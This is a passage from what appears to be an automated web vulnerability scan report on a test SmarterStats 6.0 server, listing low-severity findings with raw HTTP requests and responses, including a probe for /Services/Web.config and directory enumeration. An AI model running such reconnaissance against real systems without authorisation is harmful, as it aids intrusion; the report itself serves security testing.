   var url = ctl00_MPH_grdDynamicPages.GetUrlForSelectedRow();
   if (url != null) { var grid = ctl00_MPH_grdDynamicPages; var row = grid.GetSelectedRows()[0]; if (grid.GetVisibleRowByUid) row = grid.GetVisibleRowByUid(row); grid.DoDoubleClick(grid, row); }
   else {
       if (ctl00_MPH_grdDynamicPages.GetSelectedRows().length == 0) ShowAlertWindow('No item has been selected');
       else ShowAlertWindow('You cannot edit multiple items at once.');
   }
}
function DoDeleteQuery_ctl00_BPH_btnDeleteDynamicPages() {
   if (!self.ctl00_MPH_grdDynamicPages) return ShowAlertWindow('No item has been selected');
   var count = ctl00_MPH_grdDynamicPages.GetSelectedRowCount ? ctl00_MPH_grdDynamicPages.GetSelectedRowCount() : ctl00_MPH_grdDynamicPages.GetSelectedRows().length;
   if (count == 0) return ShowAlertWindow('No item has been selected');
   else parent.ShowConfirmWindow('Are you sure you want to delete the {0} selected item(s)?',count,'Generic',DoDelete_ctl00_BPH_btnDeleteDynamicPages);
}
function DoDelete_ctl00_BPH_btnDeleteDynamicPages() { __doPostBack('ctl00$BPH$btnDeleteDynamicPages',''); }
$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_OptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_IgnoreItemsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_ImportFilteringTab","ctl00_TPH_HyperTabStrip1_HyperTabItem4":"ctl00_MPH_DynamicPagesTab"},"ClientCallbacks":{"onTabChanged":"TabChanged"}}); });
modules['vmOptional_txt']='Value is optional';
$(function() {$vc({"lt":"Site Url","vcID":"ctl00_MPH_txtDomainUrl_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Query String Items to Ignore","vcID":"ctl00_MPH_txtQueryStringItemsToIgnore_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() { $('#ctl00_MPH_ctl04').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_ctl04_hm0":"__doPostBack(\u0027ctl00$BPH$mnuAdd\u0027,\u0027ctl00_BPH_mnuAdd_btnAdd\u0027)","ctl00_MPH_ctl04_hm0_hm0":"PopupImportFilter(\u0027/Client/Popups/frmImportFilter.aspx?UniqueID=62163e92b4114ce98972e4e87dbca8ca\u0027);","ctl00_MPH_ctl04_hm0_hm1":"PopupImportDynamicPage(\u0027/Client/Popups/frmImportDynamicPage.aspx?UniqueID=62163e92b4114ce98972e4e87dbca8ca\u0027);","ctl00_MPH_ctl04_hm1":"DoEdit_ctl00_BPH_btnEditImportFilters();","ctl00_MPH_ctl04_hm2":"DoDeleteQuery_ctl00_BPH_btnDeleteImportFilters();"},"ClientCallbacks":{}}); });
$(function() { $('#ctl00_MPH_ctl05').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_ctl05_hm0":"__doPostBack(\u0027ctl00$BPH$mnuAdd\u0027,\u0027ctl00_BPH_mnuAdd_btnAdd\u0027)","ctl00_MPH_ctl05_hm0_hm0":"PopupImportFilter(\u0027/Client/Popups/frmImportFilter.aspx?UniqueID=62163e92b4114ce98972e4e87dbca8ca\u0027);","ctl00_MPH_ctl05_hm0_hm1":"PopupImportDynamicPage(\u0027/Client/Popups/frmImportDynamicPage.aspx?UniqueID=62163e92b4114ce98972e4e87dbca8ca\u0027);","ctl00_MPH_ctl05_hm1":"DoEdit_ctl00_BPH_btnEditDynamicPages();","ctl00_MPH_ctl05_hm2":"DoDeleteQuery_ctl00_BPH_btnDeleteDynamicPages();"},"ClientCallbacks":{}}); });
//]]>
</script>
</form>
</body>
</html>


11.8. http://vulnerable.smarterstats.6.0.host:9999/Client/frmSeoSettings.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmSeoSettings.aspx

Request

POST /Client/frmSeoSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmSeoSettings.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 8021

__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem2&ctl00%24MPH%24VisiblePage=ctl00_MPH_SearchEnginesTab&ctl00%24MPH%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%247=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2410=on&__VIEWSTATE=%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%2f%2f%2f%2f%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%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAA1AV2ViSW50ZXJmYWNlAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAKT3B0aW9uc1RhYgtkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMg8y4gsAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLC
BWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAADkBTZWFyY2hFbmdpbmVzAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAQU2VhcmNoRW5naW5lc1RhYgtk7P9cHbJRho%2feZ6ho5ilLiM%2fVKcLb3S%2bSDDOyAjIcleQ%3d&ctl00%24MPH%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2411=on&ctl
00%24MPH%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24chklistEngines_SettingCheckBox%2415=on

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:04:42 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:04:42 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18930
Connection: Close



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SEO Settings - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmSeoSettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$TPH$UpdatePanel3','','tctl00$MPH$UpdatePanel5',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       SEO Settings
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>
   <div id="ctl00_BPH_btnRetrieve" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ShowReprocessPopup();; return false;"><span class="BBInner">Reprocess SEO</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           
   <div id="ctl00_TPH_UpdatePanel3">
   
           
<!-- HyperTabStrip -->
   <div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
       <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Search Engines</span></span></a></li>
       <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Web Interface</span></span></a></li>
   </ul>
   <input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem2" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>
   
       
</div>

       </div>
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_UpdatePanel5">
   
           
<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_SearchEnginesTab" />
               <div id='ctl00_MPH_SearchEnginesTab' class='' >
           <span id="ctl00_MPH_SearchEnginesTab">
                   
                   
                   <table id="ctl00_MPH_tblSeoSearchEngines" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_chklistEngines">
                   <td id="ctl00_MPH_chklistEngines_Setting" class="Indent Setting"><table id="ctl00_MPH_chklistEngines_SettingCheckBox" class="CheckboxList" border="0">
                       <tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_0" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$0" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_0">Google</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_8" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$8" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_8">Google (DE)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_15" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$15" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_15">Google (JP)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_1" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$1" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_1">Yahoo</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_9" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$9" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_9">Google (ES)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_16" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$16" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_16">Google (KR)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_2" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$2" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_2">Ask</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_10" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$10" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_10">Google (FR)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_17" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$17" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_17">Google (MX)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_3" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$3" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_3">Bing</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_11" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$11" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_11">Google (HK)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_18" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$18" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_18">Google (NL)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_4" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$4" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_4">Google (AU)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_12" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$12" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_12">Google (IN)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_19" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$19" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_19">Google (TW)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_5" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$5" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_5">Google (BR)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_13" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$13" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_13">Google (IL)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_20" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$20" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_20">Google (RU)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_6" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$6" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_6">Google (CA)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_14" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$14" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_14">Google (IT)</label></td><td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_21" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$21" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_21">Google (UK)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_chklistEngines_SettingCheckBox_7" type="checkbox" name="ctl00$MPH$chklistEngines_SettingCheckBox$7" checked="checked" /><label for="ctl00_MPH_chklistEngines_SettingCheckBox_7">Google (CN)</label></td><td></td><td></td>
                       </tr>
                   </table></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_OptionsTab' class='' style='display:none'>
           <span id="ctl00_MPH_OptionsTab">
                   <table class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtNoSearchEngines">
                   <td id="ctl00_MPH_txtNoSearchEngines_Label" class="Indent Fixed">Engine for Overviews</td><td id="ctl00_MPH_txtNoSearchEngines_Setting" class="Setting"><span id="ctl00_MPH_txtNoSearchEngines_ReadOnlyLabel">N/A</span></td>
               </tr>
           </table>
               </span></div>
       
           </div>
   
       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmseosettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
       function ShowReprocessPopup() {
           SpawnHyperWindow("/Client/Popups/frmRetrieveSEO.aspx", 320, 200, null);
       }
   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { SetTopTitle('SEO\x20Settings'); });
$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_SearchEnginesTab","ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_OptionsTab"},"ClientCallbacks":{}}); });
//]]>
</script>
</form>
</body>
</html>


11.9. http://vulnerable.smarterstats.6.0.host:9999/Services/Web.config

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/Web.config

Request

GET /Services/Web.config HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:11:05 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

11.10. http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/system_web/4_0_30319/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /aspnet_client/system_web/4_0_30319/

Request

GET /aspnet_client/system_web/4_0_30319/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/system_web/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 404 Not Found
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:12:37 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Not Found</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 404 - Not Found.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

11.11. http://vulnerable.smarterstats.6.0.host:9999/clientaccesspolicy.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /clientaccesspolicy.xml

Request

GET /clientaccesspolicy.xml HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/Popups/frmSiteFileBrowser.aspx
